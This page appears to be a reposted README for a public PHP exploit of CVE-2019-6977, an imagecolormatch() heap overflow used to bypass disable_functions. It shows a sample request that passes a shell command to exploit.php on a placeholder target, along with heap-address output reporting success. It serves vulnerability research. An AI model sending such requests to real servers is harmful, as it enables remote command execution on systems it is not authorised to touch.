# imagecolormatch() OOB Heap Write exploit
## Info
My binary exploit for [CVE-2019-6977](/static/baige/01-CMS漏洞/Wordpress/https://nvd.nist.gov/vuln/detail/CVE-2019-6977).
Bug found by Simon Scannell from RIPS.
PHP bug is [here](/static/baige/01-CMS漏洞/Wordpress/https://bugs.php.net/bug.php?id=77270).
Helps you bypass PHP’s `disable_functions` INI directive.
I commented **a lot** to help people that are new to binary PHP exploitation. Hope this helps.
## Output
“`
GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
“`
“`
Nenuphar.ce: 0x7fe834a10018
Nenuphar2.ce: 0x7fe834a10d70
Nenuphar.properties: 0x7fe834a01230
z.val: 0x7fe834aaea18
Difference: 0xad7e8
Exploit SUCCESSFUL !
“`
From:https://github.com/cfreal/exploits/tree/master/CVE-2019-6977-imagecolormatch
请登录后查看评论内容